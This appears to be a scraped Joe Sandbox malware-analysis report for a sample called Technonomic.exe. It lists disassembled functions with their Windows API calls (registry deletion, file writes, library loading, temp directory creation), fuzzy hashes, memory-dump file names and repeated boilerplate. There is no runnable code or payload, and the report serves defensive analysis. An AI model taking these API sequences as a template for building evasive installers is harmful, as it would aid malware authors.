Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: c6e0b2e8dbd325c6a63e6ba070a9d5cf510bd218eb5002d0b1f80879fa38eeb3
Instruction ID: e180782171dce9fa6fade52b03e39cf5b39f26fab5a396fb1bde1b9fb5ac53b7
Opcode Fuzzy Hash: c6e0b2e8dbd325c6a63e6ba070a9d5cf510bd218eb5002d0b1f80879fa38eeb3
Instruction Fuzzy Hash: 2111A331911205EBDB10CFA0CB489BEB7B4EF44354F20843FE446B72D0D6B85A41DB19

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
Instruction ID: 26eaddb35cdc13faf07641838d00295e4864c68e45bdd86d166378f51b3c2f7b
Opcode Fuzzy Hash: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
Instruction Fuzzy Hash: 3201F431724210EBE7295B389D04B6A3698E710714F10897FF855F62F1D678CC028B5D

Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
RegCloseKey.ADVAPI32(00000000), ref: 00402347

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: e10cef08bc8bbd86e44cd2e6a93393b87c6fb5f379b9916ae68ae103a788fbbd
Instruction ID: 60bb5986470d48ad8cc55f7ac878df2b05d68ac6ea48f0c646ace7267bb4d846
Opcode Fuzzy Hash: e10cef08bc8bbd86e44cd2e6a93393b87c6fb5f379b9916ae68ae103a788fbbd
Instruction Fuzzy Hash: 88F04F32A04110ABEB11BFB59B4EABE72699B40314F15807BF501B71D5D9FC9902962D

Function 00406559 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
GetProcAddress.KERNEL32(00000000,?), ref: 00406586

Part of subcall function 004064ED: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
Part of subcall function 004064ED: wsprintfW.USER32 ref: 0040653F
Part of subcall function 004064ED: LoadLibraryW.KERNELBASE(?), ref: 0040654F

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
Instruction ID: e4d993762fdbf4af8c35b1588ad4eaffa1172a51f023226dd59e00ceba6dfa89
Opcode Fuzzy Hash: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
Instruction Fuzzy Hash: 12E086335042106BD2105B70AF4487773B89E94704306083EF546F2044D778DC329A6D

Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
EnableWindow.USER32(00000000,00000000), ref: 00401DFD

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 075d78e16e831d865290747b9eef420f676278b691cb94837bc861c0c9eb665c
Instruction ID: 2c738a9deecb2df013c07ba3b1cf6af0bd96662f3609e31d22ea84ca5a045a2b
Opcode Fuzzy Hash: 075d78e16e831d865290747b9eef420f676278b691cb94837bc861c0c9eb665c
Instruction Fuzzy Hash: 4FE08C326005009BCB20AFB5AB4999D3375DF50369710007BE442F10E1CABC9C408A2D

Function 00405D58 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\Technonomic.exe,80000000,00000003), ref: 00405D5C
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19

Function 00405D33 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405938,?,?,00000000,00405B0E,?,?,?,?), ref: 00405D38
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D4C

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction ID: bbac5bc73aa77dea78574471440e90d8105817861fa72b5948562f5081259be0
Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction Fuzzy Hash: 1CD0C976504520ABC2112728AE0C89BBB55EB54371B028B35FAA9A22B0CB304C568A98

Function 0040582E Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405834
GetLastError.KERNEL32 ref: 00405842

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction ID: 106bcc9dbfec6d9c4c73fbe0ebad0997e3226ea8ec62ae9f19e78208b048f617
Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction Fuzzy Hash: C9C04C31204A019AD6606B209F09B177954EB50741F1184396946E00A0DB348425DE2D

Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9

Function 00405E0A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0040CEF0,004032EF,0040CEF0,?,00414EF0,00004000,?,00000000,00403119,00000004), ref: 00405E1E

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: 23ec5f7379bf279edb3dbb3262258d5736cfdadd2d5b14d2449b9c6e52f850f2
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 4DE08C3224021EABCF109F50CC08EEB3B6CEB00360F044432FA99E2080D230EA209BE4

Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
Instruction ID: 027cd1837f043f16bcd3791d2c18ee9a5769249626570c171517a7e702d59ee3
Opcode Fuzzy Hash: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
Instruction Fuzzy Hash: 17E0EC76254108BFDB10EFA9EE4BFE97BECAB44704F008435BA09E70E1C674E5509B69

Function 00405DDB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040336B,?,?,0040326F,00414EF0,00004000,?,00000000,00403119), ref: 00405DEF

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction ID: 619b4f5876fe922fe119770d1c4b6382a551d6d1c0a67235faeb4c306daddfa0
Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction Fuzzy Hash: BAE08C3220021AABCF10AF90CC04AEB3B6CEB083A0F004833F951E3140D230E9618BE4

Function 00404293 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
Instruction ID: 2f2862f802f4bb8c259b254183006bf3f0de574643f6f04ef9dece27a841d158
Opcode Fuzzy Hash: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
Instruction Fuzzy Hash: 24C04C71740600BBDA208B509E45F1677546754740F1448697740A50E0C674E410D62D

Function 0040336E Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
